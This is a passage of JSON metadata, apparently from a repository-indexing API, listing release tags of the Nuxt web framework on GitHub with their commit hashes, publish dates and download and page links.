ha":"dcfb42b77221f559e7ccb09edd5c2a2004c5bc6b","kind":"tag","published_at":"2021-02-15T11:06:39.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.15.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.15.0/manifests"},{"name":"v2.14.12","sha":"bde4c5f6b0e643716d97027cdd185891ada02f7f","kind":"tag","published_at":"2020-12-16T13:15:19.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.12","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.12","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.12/manifests"},{"name":"v2.14.11","sha":"d85f4b92642f4668463deb286524d424e57a1f62","kind":"tag","published_at":"2020-12-09T23:21:57.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.11","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.11","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.11/manifests"},{"name":"v2.14.10","sha":"e97051adfafb9517cabbfd9b87a02e8c37ce949e","kind":"tag","published_at":"2020-12-07T10:30:01.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.10","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.10","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.10/manifests"},{"name":"v2.14.9","sha":"e9f380c9e6b729ab77b38babba6ad15e95b4efa8","kind":"tag","published_at":"2020-12-02T10:35:33.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.9","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.9","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.9/manifests"},{"name":"v2.14.8","sha":"68d8fb84872b807b2149756bb97a84961854a2c3","kind":"tag","published_at":"2020-12-01T11:06:52.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.8","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.8/manifests"},{"name":"v2.14.7","sha":"265d0e7aac3df9f83f323c4d2dba11434956fe9b","kind":"tag","published_at":"2020-10-15T16:29:55.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.7","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.7/manifests"},{"name":"v2.14.6","sha":"41176577ad71a8b91a91ca8f458fd64a278dd88d","kind":"tag","published_at":"2020-09-21T10:46:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.6","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.6/manifests"},{"name":"v2.14.5","sha":"3b037720f2edc3e351d200bbb8525df1e93d7aad","kind":"tag","published_at":"2020-09-10T12:36:26.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.5/manifests"},{"name":"v2.14.4","sha":"1a77fba4eb247faa3f1c8ec0fa49ce372abeb1d8","kind":"tag","published_at":"2020-08-27T10:26:49.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.4/manifests"},{"name":"v2.14.3","sha":"5e9d759d7bee6a3d32e16ef05eef988e882c600a","kind":"tag","published_at":"2020-08-16T17:04:29.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.3/manifests"},{"name":"v2.14.2","sha":"34c56722c8c97c0c6a59ecfbc5836c38047e4572","kind":"tag","published_at":"2020-08-16T10:59:06.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.2/manifests"},{"name":"v2.14.1","sha":"c30499d7e02cd6d8b51d97ee7d7a537d8a59f63b","kind":"tag","published_at":"2020-08-04T16:37:13.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.1/manifests"},{"name":"v2.14.0","sha":"60f68638cb80ab461c5b02be34e8797677bd8dd1","kind":"tag","published_at":"2020-07-27T17:25:24.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.14.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.14.0/manifests"},{"name":"v2.13.3","sha":"e3821ba78c23fafa753941a0c206bd23e39dd678","kind":"tag","published_at":"2020-07-02T18:08:18.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.13.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.13.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.13.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.13.3/manifests"},{"name":"v2.13.2","sha":"c998072c94eef659d45819eaa2b18897b8923538","kind":"tag","published_at":"2020-06-26T19:03:12.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.13.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.13.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.13.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.13.2/manifests"},{"name":"v2.13.1","sha":"56b158e7d689ba9f57e7aa83d672f5f32b18767b","kind":"tag","published_at":"2020-06-24T08:38:23.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.13.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.13.1/manifests"},{"name":"v2.13.0","sha":"dbecbe4adae6a7ae172eb01a232d1804c7b996bc","kind":"tag","published_at":"2020-06-18T17:45:27.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.13.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.13.0/manifests"},{"name":"v2.12.2","sha":"fb33bda6d114cde19b029ab71c810032ef51184f","kind":"tag","published_at":"2020-03-31T10:43:15.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.12.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.12.2/manifests"},{"name":"v2.12.1","sha":"8d355956d49c71349d165c4ca7531107e20d7b27","kind":"tag","published_at":"2020-03-25T19:22:04.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.12.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.12.1/manifests"},{"name":"v2.12.0","sha":"205a089f833f96298d9bd723aea15b93618ec05d","kind":"tag","published_at":"2020-03-17T16:45:28.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.12.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.12.0/manifests"},{"name":"v2.11.0","sha":"7af9ec8c23d247b22f71866b7b5dcd100f08048d","kind":"tag","published_at":"2019-12-17T10:23:56.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.11.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.11.0/manifests"},{"name":"v2.10.2","sha":"f6aa45dda605cae2ea51f7413c97190a7a02cb88","kind":"commit","published_at":"2019-10-21T21:16:29.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.10.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.10.2/manifests"},{"name":"v2.10.1","sha":"624c4c058e47fd36c484efaf1494b762f585f633","kind":"tag","published_at":"2019-10-11T08:11:06.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.10.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.10.1/manifests"},{"name":"v2.10.0","sha":"c17afa77a7c7490863c2040c8f448ba80082a891","kind":"tag","published_at":"2019-10-02T11:44:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.10.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.10.0/manifests"},{"name":"v2.9.2","sha":"c8ee9a660809e856c28d8678c6a632bbdd6ed00f","kind":"tag","published_at":"2019-08-28T11:32:13.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.9.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.9.2/manifests"},{"name":"v2.9.1","sha":"0157b971de97daecf2fadeafa5596ddaa30cdb28","kind":"tag","published_at":"2019-08-20T11:13:09.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.9.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.9.1/manifests"},{"name":"v2.9.0","sha":"ce3b4569613866a69b96f0f89aa2bb7d9810f8c4","kind":"tag","published_at":"2019-08-20T08:24:09.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.9.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.9.0/manifests"},{"name":"v2.8.1","sha":"2fabea9402864828fe9aafe8b0d13bcc674a1b3b","kind":"tag","published_at":"2019-06-04T20:28:35.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.8.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.8.1/manifests"},{"name":"v2.8.0","sha":"82ec7b7dedfbc3a01b981a0ef72375814e023291","kind":"tag","published_at":"2019-05-30T17:09:23.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.8.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.8.0/manifests"},{"name":"v2.7.1","sha":"0f609dfb3772ec2682bf67c42762df6041dab034","kind":"tag","published_at":"2019-05-14T18:56:35.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.7.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.7.1/manifests"},{"name":"v2.7.0","sha":"5a98230ec617582f7b9393ad27e20fb5a1e6aa04","kind":"tag","published_at":"2019-05-14T12:38:09.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.7.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.7.0/manifests"},{"name":"v2.6.3","sha":"2108cd669c56bb2e566c35ac73d8e693b5ce5c54","kind":"tag","published_at":"2019-04-25T08:43:24.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.6.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.6.3/manifests"},{"name":"v2.6.2","sha":"8d14cd4781095dff46a57ae05d60bbaccefb0fbd","kind":"tag","published_at":"2019-04-21T11:22:10.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.6.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.6.2/manifests"},{"name":"v2.6.1","sha":"c0776eb2d78f839d2b1249765d2eb117b5f32d2e","kind":"tag","published_at":"2019-04-04T17:58:06.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.6.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.6.1/manifests"},{"name":"v2.6.0","sha":"0e51676731e975226a7135003b941b9077256641","kind":"tag","published_at":"2019-04-04T17:06:17.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.6.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.6.0/manifests"},{"name":"v2.5.1","sha":"5d7757bf299c724bb52df529c5dbd1a341b19951","kind":"tag","published_at":"2019-03-21T21:48:39.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.5.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.5.1/manifests"},{"name":"v2.5.0","sha":"e2c296321b8f70c3e977ed11a0825870a2cc528a","kind":"tag","published_at":"2019-03-21T13:07:34.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.5.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.5.0/manifests"},{"name":"v2.4.5","sha":"0ad13e04d2cae232d807ba0dd100b8f3f7bbb010","kind":"commit","published_at":"2019-02-26T10:31:42.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.4.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.4.5/manifests"},{"name":"v2.4.3","sha":"13e494c0f0013252994eb0de0c4d92bd507b119d","kind":"tag","published_at":"2019-02-06T15:56:54.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.4.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.4.3/manifests"},{"name":"v2.4.2","sha":"32b0f155c97a5c7f7cb7cc450274e10a492c9c39","kind":"tag","published_at":"2019-01-30T15:15:06.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.4.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.4.2/manifests"},{"name":"v2.4.0","sha":"5f221b4b7e39e4804bde682b2e71780a7a1e2845","kind":"tag","published_at":"2019-01-28T17:41:28.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.4.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.4.0/manifests"},{"name":"v1.4.5","sha":"c8962964b8ced4c703804ed9cc5e54c6d486a321","kind":"tag","published_at":"2018-11-27T17:37:42.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.4.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.5/manifests"},{"name":"v2.3.4","sha":"16c5b892fa3104992f3a6778ac97a0fcb1ca657c","kind":"tag","published_at":"2018-11-26T17:50:03.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.3.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.3.4/manifests"},{"name":"v2.3.2","sha":"205c9d38156c60d93248b9d973a615eee7355f22","kind":"tag","published_at":"2018-11-20T20:49:05.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.3.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.3.2/manifests"},{"name":"v2.3.1","sha":"f75a4423354f16603a6b733ca12d873e501f4442","kind":"tag","published_at":"2018-11-16T19:28:01.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.3.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.3.1/manifests"},{"name":"v1.4.4","sha":"8fb8376ff70b9db5feda4492009b0fb7d3e2884a","kind":"tag","published_at":"2018-10-19T14:00:22.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.4.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.4/manifests"},{"name":"v1.4.3","sha":"f5aff938f7742624708b4eecc7a2b003c1a1d161","kind":"tag","published_at":"2018-10-19T13:45:13.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.4.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.3/manifests"},{"name":"v2.3.0","sha":"dbf3ccc4c142083a76fbc4f3281f04e9b3044b79","kind":"commit","published_at":"2018-10-17T21:35:43.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.3.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.3.0/manifests"},{"name":"v2.2.0","sha":"e3b72ded5c56b62ca25f180390a1d60ce8123b5b","kind":"tag","published_at":"2018-10-13T19:07:52.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.2.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.2.0/manifests"},{"name":"v2.1.0","sha":"fdb225fbeb452a421f1484e3a1a16f26952d386e","kind":"tag","published_at":"2018-09-30T16:28:05.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.1.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.1.0","dependen